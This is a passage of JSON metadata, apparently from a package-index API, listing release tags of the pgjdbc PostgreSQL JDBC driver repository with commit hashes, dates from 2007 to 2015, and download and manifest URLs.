pi/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200/manifests"},{"name":"REL9_3_1103","sha":"ed37012bb880dde1c2a8b2949dfa47bbad6d7c37","kind":"commit","published_at":"2015-01-02T20:04:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1103","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103/manifests"},{"name":"REL9_3_1102","sha":"820d560ff5ade8cd63083339d23b655ba5def6a7","kind":"tag","published_at":"2014-07-10T20:55:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1102","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102/manifests"},{"name":"REL9_3_1101","sha":"f2d036adbea166e9a6574b6ee430e81dcd6d5f7e","kind":"commit","published_at":"2014-02-18T13:50:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1101","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1101","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1101","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101/manifests"},{"name":"REL9_2_1004","sha":"38152acc7b38c74476d9f85f21216c586ada7988","kind":"tag","published_at":"2013-10-31T14:04:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1004","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1004","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1004","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004/manifests"},{"name":"REL9_3_1100","sha":"09eb20272c825cac351ba4bb8c251ed7bb5dd5d3","kind":"tag","published_at":"2013-10-31T14:02:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1100","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1100","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1100","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100/manifests"},{"name":"REL9_2_1003","sha":"947d5ab59c3bdfb43468ee5251aef1c73e91c9fd","kind":"tag","published_at":"2013-06-06T13:43:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1003","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1003","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1003","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003/manifests"},{"name":"REL9_2_1001","sha":"1cd438695dc35cf4c1453e5d225f698c28d7389e","kind":"tag","published_at":"2012-11-14T21:54:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1001","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1001","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1001","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001/manifests"},{"name":"REL9_2_1002","sha":"f9c2e98d9c80abb2b04690c8bc0c16f11a797c79","kind":"tag","published_at":"2012-11-14T21:29:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1002","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1002","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1002","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002/manifests"},{"name":"REL9_1_903","sha":"3fdf1a0f4f533a1bdf59e7e0f3e5e49656d30d5b","kind":"commit","published_at":"2012-09-27T14:08:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_903","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_903","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_903","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903/manifests"},{"name":"list","sha":"1f0403ea22970855e6a4f3164180ac7077cfebdf","kind":"commit","published_at":"2012-05-02T18:12:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/list","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/list","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@list","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list/manifests"},{"name":"REL9_1_902","sha":"557d6f329197b293b2220fb7ebf0be3709c06f88","kind":"commit","published_at":"2012-04-26T01:42:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_902","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_902","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_902","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902/manifests"},{"name":"REL9_1_901","sha":"928f33efecaf0c541b95e3c9e8404f7ba617d0eb","kind":"commit","published_at":"2011-09-11T01:38:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_901","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_901","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_901","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901/manifests"},{"name":"REL9_0_802","sha":"6b3a04fc10e71ff4affd6624a53d24b3fad20999","kind":"commit","published_at":"2011-09-11T01:18:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_802","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_802","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_802","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802/manifests"},{"name":"REL8_4_703","sha":"8f4050a1ec42b9db646193381db2a3e6bb981c75","kind":"commit","published_at":"2011-09-11T01:17:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_703","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_703","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_703","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703/manifests"},{"name":"REL8_3_607","sha":"87173901b381a34c0010b3b4d45223c40ef1c76f","kind":"commit","published_at":"2011-09-11T01:14:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_607","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607/manifests"},{"name":"REL8_2_512","sha":"2765d2fe73dcab4016950ec63857e530087464d1","kind":"commit","published_at":"2011-09-10T04:24:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_512","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512/manifests"},{"name":"REL9_0_801","sha":"2e39cc38ddc3ba8028f0acd45bad69dc4d3d691b","kind":"commit","published_at":"2010-09-20T21:32:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_801","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_801","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_801","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801/manifests"},{"name":"REL8_0_325","sha":"f7842c2feb40e7e7549f2ed54fb3df1cd4ef7386","kind":"commit","published_at":"2010-05-12T06:41:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_325","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_325","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_325","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325/manifests"},{"name":"REL8_1_415","sha":"1219f0e80e5662997d460cb28148577c71e00432","kind":"commit","published_at":"2010-05-12T06:40:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_415","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_415","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_415","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415/manifests"},{"name":"REL8_2_511","sha":"f597791a65c8c277c7cdb2a92709637352b1fde7","kind":"commit","published_at":"2010-05-12T06:40:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_511","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511/manifests"},{"name":"REL8_3_606","sha":"5e1cb768622fcf53818de0318004166d1c942587","kind":"commit","published_at":"2010-05-12T06:39:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_606","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606/manifests"},{"name":"REL8_4_702","sha":"034baa3e624ac87b11111480d1b4e35a2583a854","kind":"commit","published_at":"2010-05-12T06:36:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_702","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_702","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_702","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702/manifests"},{"name":"REL8_0_324","sha":"a69999ff3b80ceb3777817d08496468edc725765","kind":"commit","published_at":"2009-07-01T05:16:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_324","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_324","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_324","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324/manifests"},{"name":"REL8_1_414","sha":"ca013de95da92dadb9fafc940029fe15757ae2af","kind":"commit","published_at":"2009-07-01T05:16:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_414","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_414","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_414","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414/manifests"},{"name":"REL8_2_510","sha":"a722ade8395fb287471001e0246f190a2b859552","kind":"commit","published_at":"2009-07-01T05:16:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_510","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510/manifests"},{"name":"REL8_3_605","sha":"577936d8d7f7e9a1b6c7d725a96513a9b19498e3","kind":"commit","published_at":"2009-07-01T05:16:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_605","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605/manifests"},{"name":"REL8_4_701","sha":"05af6314b92554e30034d49426b941ce621f9dee","kind":"commit","published_at":"2009-07-01T05:15:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_701","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_701","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_701","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701/manifests"},{"name":"REL8_0_323","sha":"f2873cda04abcfb05695501c88dbee6bcd41d046","kind":"commit","published_at":"2008-11-16T13:46:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_323","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_323","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_323","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323/manifests"},{"name":"REL8_1_413","sha":"2eb09ad9c7b2fddc88b4a87598f3734d4d2b433e","kind":"commit","published_at":"2008-11-16T13:45:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_413","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_413","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_413","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413/manifests"},{"name":"REL8_2_509","sha":"3b35c0939abce6f600d19312c644475db6d0d4bd","kind":"commit","published_at":"2008-11-16T13:45:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_509","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509/manifests"},{"name":"REL8_3_604","sha":"f8e3280f3cee126b0ad765fbdac92b40b784d469","kind":"commit","published_at":"2008-11-16T13:45:43.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_604","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604/manifests"},{"name":"REL8_0_322","sha":"b3bc99ec992aa793817539a726416ed8c8df38cc","kind":"commit","published_at":"2008-01-31T09:55:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_322","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_322","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_322","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322/manifests"},{"name":"REL8_1_412","sha":"c29d8b99429462a17d7ba0b8e8f6daedab92e80e","kind":"commit","published_at":"2008-01-31T09:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_412","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_412","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_412","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412/manifests"},{"name":"REL8_2_508","sha":"2566771421d25f8b674a932e182e671504ce0480","kind":"commit","published_at":"2008-01-31T09:55:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_508","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508/manifests"},{"name":"REL8_3_603","sha":"8a2eef81e45d07130e2d86bc8a18cc14642e2741","kind":"commit","published_at":"2008-01-31T09:54:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_603","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603/manifests"},{"name":"REL8_0_321","sha":"4d7ea8b0061ef946705cbd46ee70cb5984f3a5e7","kind":"commit","published_at":"2007-12-02T08:31:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_321","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_321","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_321","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321/manifests"},{"name":"REL8_1_411","sha":"4f487c433534b25222a81f7e80394ef3d52d72fe","kind":"commit","published_at":"2007-12-02T08:30:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_411","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_411","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_411","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411/manifests"},{"name":"REL8_2_507","sha":"9f13dae31b5fdf75abd1552ec590749bf09e052d","kind":"commit","published_at":"2007-12-02T08:30:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_507","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507/manifests"},{"name":"REL8_0_320","sha":"a72e305c0133dd8b962ab06cb991b44927317dd9","kind":"commit","published_at":"2007-07-31T06:07:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_320","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_320","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_320","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320/manifests"},{"name":"REL8_1_410","sha":"5619f9ef751da6bfa6b619cf62716bb315f7eba8","kind":"commit","published_at":"2007-07-31T06:06:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_410","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_410","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_410","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410/manifests"},{"name":"REL8_2_506","sha":"12eceb1ff7a04d25bf74bda80a59f37ac53110a3","kind":"commit","published_at":"2007-07-31T06:06:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_506","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506/manifests"},{"name":"REL8_2_505","sha":"91879290313ab6f64e05f9f366c368dc8419516c","kind":"commit","published_at":"2007-04-18T08:15:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_505","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505/manifests"},{"name":"REL8_1_409","sha":"ef22d89fe798811a7ac7a143b0620043eb0acd00","kind":"commit","published_at":"2007-04-18T08:14:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_409","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_409","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_409","tag_url":"https://repos.ecosyste.ms/api/